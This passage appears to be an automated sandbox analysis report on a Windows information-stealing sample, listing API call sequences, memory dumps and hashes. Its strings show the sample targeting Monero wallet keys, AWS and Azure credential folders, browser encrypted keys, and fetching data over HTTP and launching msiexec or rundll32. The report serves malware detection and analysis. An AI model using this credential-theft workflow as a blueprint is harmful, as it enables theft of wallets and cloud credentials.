                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: faf6d1064001599edbcf642de9054f2717972666b095ad02720af17092d2096a
                                • Instruction ID: 714366278f1c40ebf818d398391a5ec6fc7160e6538b47f1cc1d4c7fbe2d8604
                                • Opcode Fuzzy Hash: faf6d1064001599edbcf642de9054f2717972666b095ad02720af17092d2096a
                                • Instruction Fuzzy Hash: D312F071920128ABDF15EBA0DC95FEEB378BF15700F504199F10A66092EF702E49DFA6
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D0E0B0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008CF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0008D0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0008D0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 0008D208
                                • lstrcat.KERNEL32(?,000A1478), ref: 0008D217
                                • lstrcat.KERNEL32(?,00000000), ref: 0008D22A
                                • lstrcat.KERNEL32(?,000A147C), ref: 0008D239
                                • lstrcat.KERNEL32(?,00000000), ref: 0008D24C
                                • lstrcat.KERNEL32(?,000A1480), ref: 0008D25B
                                • lstrcat.KERNEL32(?,00000000), ref: 0008D26E
                                • lstrcat.KERNEL32(?,000A1484), ref: 0008D27D
                                • lstrcat.KERNEL32(?,00000000), ref: 0008D290
                                • lstrcat.KERNEL32(?,000A1488), ref: 0008D29F
                                • lstrcat.KERNEL32(?,00000000), ref: 0008D2B2
                                • lstrcat.KERNEL32(?,000A148C), ref: 0008D2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 0008D2D4
                                • lstrcat.KERNEL32(?,000A1490), ref: 0008D2E3
                                  • Part of subcall function 0009A820: lstrlen.KERNEL32(00084F05,?,?,00084F05,000A0DDE), ref: 0009A82B
                                  • Part of subcall function 0009A820: lstrcpy.KERNEL32(000A0DDE,00000000), ref: 0009A885
                                • lstrlen.KERNEL32(?), ref: 0008D32A
                                • lstrlen.KERNEL32(?), ref: 0008D339
                                  • Part of subcall function 0009AA70: StrCmpCA.SHLWAPI(00D08BA0,0008A7A7,?,0008A7A7,00D08BA0), ref: 0009AA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 0008D3B4
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 9964d2c992b8860c7fcd0cc36fc879bcd292464d8a692983f351dbfa60b668cf
                                • Instruction ID: f89de1bb56450c764b7f47e0469d67eabcd0712c4ca22911efd14a61c52b4183
                                • Opcode Fuzzy Hash: 9964d2c992b8860c7fcd0cc36fc879bcd292464d8a692983f351dbfa60b668cf
                                • Instruction Fuzzy Hash: ADE10071A10118ABCF04FBA0ED9AEEE7378BF15305F104159F507A6092DF35AE09DBA6
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00D0D100,00000000,?,000A144C,00000000,?,?), ref: 0008CA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0008CA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0008CA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0008CAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0008CAD9
                                • StrStrA.SHLWAPI(?,00D0D130,000A0B52), ref: 0008CAF7
                                • StrStrA.SHLWAPI(00000000,00D0D310), ref: 0008CB1E
                                • StrStrA.SHLWAPI(?,00D0DC48,00000000,?,000A1458,00000000,?,00000000,00000000,?,00D08B90,00000000,?,000A1454,00000000,?), ref: 0008CCA2
                                • StrStrA.SHLWAPI(00000000,00D0DFA8), ref: 0008CCB9
                                  • Part of subcall function 0008C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0008C871
                                  • Part of subcall function 0008C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0008C87C
                                • StrStrA.SHLWAPI(?,00D0DFA8,00000000,?,000A145C,00000000,?,00000000,00D08C20), ref: 0008CD5A
                                • StrStrA.SHLWAPI(00000000,00D08A60), ref: 0008CD71
                                  • Part of subcall function 0008C820: lstrcat.KERNEL32(?,000A0B46), ref: 0008C943
                                  • Part of subcall function 0008C820: lstrcat.KERNEL32(?,000A0B47), ref: 0008C957
                                  • Part of subcall function 0008C820: lstrcat.KERNEL32(?,000A0B4E), ref: 0008C978
                                • lstrlen.KERNEL32(00000000), ref: 0008CE44
                                • CloseHandle.KERNEL32(00000000), ref: 0008CE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: ff73c85a301088a0c9d17bef5a10061eaaa6ad89371addadc769eb1073fbf501
                                • Instruction ID: 626de513e33d690be341d73d10f2f4660a6e414ec487aa66be32ac60f9d30a60
                                • Opcode Fuzzy Hash: ff73c85a301088a0c9d17bef5a10061eaaa6ad89371addadc769eb1073fbf501
                                • Instruction Fuzzy Hash: 08E1FD71A10118ABDF14EBA4EC96FEFB778BF15304F404159F10667192EF306A4ADBA2
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • RegOpenKeyExA.ADVAPI32(00000000,00D0B550,00000000,00020019,00000000,000A05B6), ref: 000983A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00098426
                                • wsprintfA.USER32 ref: 00098459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0009847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 0009848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00098499
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 79a3144cd659da5532454cc30e5b4d294da1fab59bcef9757c56aec5c9eb5717
                                • Instruction ID: b30e5b9cca1dc3f8279136f65e1e3d3c2f3298e61c6bf0c68195291e9900eca7
                                • Opcode Fuzzy Hash: 79a3144cd659da5532454cc30e5b4d294da1fab59bcef9757c56aec5c9eb5717
                                • Instruction Fuzzy Hash: 4F81097191012CABDF24DB60DD95FEAB7B8BF09704F008299E109A6181DF716B89DFE1
                                APIs
                                  • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00094DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00094DCD
                                  • Part of subcall function 00094910: wsprintfA.USER32 ref: 0009492C
                                  • Part of subcall function 00094910: FindFirstFileA.KERNEL32(?,?), ref: 00094943
                                • lstrcat.KERNEL32(?,00000000), ref: 00094E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00094E59
                                  • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FDC), ref: 00094971
                                  • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FE0), ref: 00094987
                                  • Part of subcall function 00094910: FindNextFileA.KERNEL32(000000FF,?), ref: 00094B7D
                                  • Part of subcall function 00094910: FindClose.KERNEL32(000000FF), ref: 00094B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00094EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00094EE5
                                  • Part of subcall function 00094910: wsprintfA.USER32 ref: 000949B0
                                  • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A08D2), ref: 000949C5
                                  • Part of subcall function 00094910: wsprintfA.USER32 ref: 000949E2
                                  • Part of subcall function 00094910: PathMatchSpecA.SHLWAPI(?,?), ref: 00094A1E
                                  • Part of subcall function 00094910: lstrcat.KERNEL32(?,00D0F348), ref: 00094A4A
                                  • Part of subcall function 00094910: lstrcat.KERNEL32(?,000A0FF8), ref: 00094A5C
                                  • Part of subcall function 00094910: lstrcat.KERNEL32(?,?), ref: 00094A70
                                  • Part of subcall function 00094910: lstrcat.KERNEL32(?,000A0FFC), ref: 00094A82
                                  • Part of subcall function 00094910: lstrcat.KERNEL32(?,?), ref: 00094A96
                                  • Part of subcall function 00094910: CopyFileA.KERNEL32(?,?,00000001), ref: 00094AAC
                                  • Part of subcall function 00094910: DeleteFileA.KERNEL32(?), ref: 00094B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 9d61ede0bbc3add9b2c5b57e6d487ce36ca3e33fe17a992f3bc8ff096abd718f
                                • Instruction ID: 0953c9f445540c8555ce7db946bf91ca451748038c698ca20f24bf2a279a20c2
                                • Opcode Fuzzy Hash: 9d61ede0bbc3add9b2c5b57e6d487ce36ca3e33fe17a992f3bc8ff096abd718f
                                • Instruction Fuzzy Hash: DE41867A94020867DB50F7B0EC4BFEE7738AB65704F0045547689AA0C2EEF45BC9DB92
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0009906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 8605a3544961c51f9712491762c16dd7805ae08552c0806fa01d0f56682a012d
                                • Instruction ID: 19490ac2f9758468b87c934930cb18bf1ff2a3f4f9da5ac8137e6cb047c38a60
                                • Opcode Fuzzy Hash: 8605a3544961c51f9712491762c16dd7805ae08552c0806fa01d0f56682a012d
                                • Instruction Fuzzy Hash: A671CA75A10208EBDF14EBE4EC89FEEB7B9BF48704F108508F515A7290DB35A905DB61
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 000931C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 0009335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 000934EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: cddfba62dc638f1565a8cc61a7838f963549634af5821fbddc17730351c2f522
                                • Instruction ID: 5fc5229e17d6dad0c005e502d56c18b656ceee13835ee0d58fcdb392329c72e9
                                • Opcode Fuzzy Hash: cddfba62dc638f1565a8cc61a7838f963549634af5821fbddc17730351c2f522
                                • Instruction Fuzzy Hash: 32121C71910118AADF19FBA0DC92FEEB778AF15300F504169F50666192EF342B4EDFA2
                                APIs
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 00086280: InternetOpenA.WININET(000A0DFE,00000001,00000000,00000000,00000000), ref: 000862E1
                                  • Part of subcall function 00086280: StrCmpCA.SHLWAPI(?,00D0F398), ref: 00086303
                                  • Part of subcall function 00086280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086335
                                  • Part of subcall function 00086280: HttpOpenRequestA.WININET(00000000,GET,?,00D0EDF8,00000000,00000000,00400100,00000000), ref: 00086385
                                  • Part of subcall function 00086280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000863BF
                                  • Part of subcall function 00086280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000863D1
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095318
                                • lstrlen.KERNEL32(00000000), ref: 0009532F
                                  • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00095364
                                • lstrlen.KERNEL32(00000000), ref: 00095383
                                • lstrlen.KERNEL32(00000000), ref: 000953AE
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: a6eeea0782c8a35875427f158f3937a29565f8c82e176cf8840762f7d1de66af
                                • Instruction ID: 521ff6382330c34a2cfff53f29621142d11eb519d8e86c115e64fd741acc8457
                                • Opcode Fuzzy Hash: a6eeea0782c8a35875427f158f3937a29565f8c82e176cf8840762f7d1de66af
                                • Instruction Fuzzy Hash: 8951DC30A20148DBCF14FF64DD96EEE7779AF11341F504018E50A5A593DF346B4AEBA2
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: d131b11e0dbd7c6b591ad77317a1ee31ba9173c1e65643936f1c2dc3b458e36b
                                • Instruction ID: 4e08e7c70d2adcc613d3717e5a6d39441d64e7136e9a3085d81f349a86b35bfb
                                • Opcode Fuzzy Hash: d131b11e0dbd7c6b591ad77317a1ee31ba9173c1e65643936f1c2dc3b458e36b
                                • Instruction Fuzzy Hash: 41C184B5A0021D9BCF14EF60DC8AFEE7378BB54304F004599F50AA7292DB70AA85DF91
                                APIs
                                  • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 000942EC
                                • lstrcat.KERNEL32(?,00D0EBB8), ref: 0009430B
                                • lstrcat.KERNEL32(?,?), ref: 0009431F
                                • lstrcat.KERNEL32(?,00D0D1D8), ref: 00094333
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 00098D90: GetFileAttributesA.KERNEL32(00000000,?,00081B54,?,?,000A564C,?,?,000A0E1F), ref: 00098D9F
                                  • Part of subcall function 00089CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00089D39
                                  • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                  • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                  • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                  • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                  • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                  • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                  • Part of subcall function 000993C0: GlobalAlloc.KERNEL32(00000000,000943DD,000943DD), ref: 000993D3
                                • StrStrA.SHLWAPI(?,00D0EC60), ref: 000943F3
                                • GlobalFree.KERNEL32(?), ref: 00094512
                                  • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089AEF
                                  • Part of subcall function 00089AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00084EEE,00000000,?), ref: 00089B01
                                  • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089B2A
                                  • Part of subcall function 00089AC0: LocalFree.KERNEL32(?,?,?,?,00084EEE,00000000,?), ref: 00089B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 000944A3
                                • StrCmpCA.SHLWAPI(?,000A08D1), ref: 000944C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 000944D2
                                • lstrcat.KERNEL32(00000000,?), ref: 000944E5
                                • lstrcat.KERNEL32(00000000,000A0FB8), ref: 000944F4
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: aa768effaf19ed74a16061c6652d74183ae633ca3b50e2d1be64c078b4b5e22a
                                • Instruction ID: 7a573a6da8c884c416315c700663ba0fa75897bcaad5cd82a7786541fe21e75d
                                • Opcode Fuzzy Hash: aa768effaf19ed74a16061c6652d74183ae633ca3b50e2d1be64c078b4b5e22a
                                • Instruction Fuzzy Hash: D4712876900208ABDF14FBE4EC89FEE77B9BB48304F044598F60597182EA35DB45DB91
                                APIs
                                  • Part of subcall function 000812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000812B4
                                  • Part of subcall function 000812A0: RtlAllocateHeap.NTDLL(00000000), ref: 000812BB
                                  • Part of subcall function 000812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000812D7
                                  • Part of subcall function 000812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000812F5
                                  • Part of subcall function 000812A0: RegCloseKey.ADVAPI32(?), ref: 000812FF
                                • lstrcat.KERNEL32(?,00000000), ref: 0008134F
                                • lstrlen.KERNEL32(?), ref: 0008135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00081377
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D0E0B0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00081465
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                  • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                  • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                  • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                  • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                  • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 000814EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
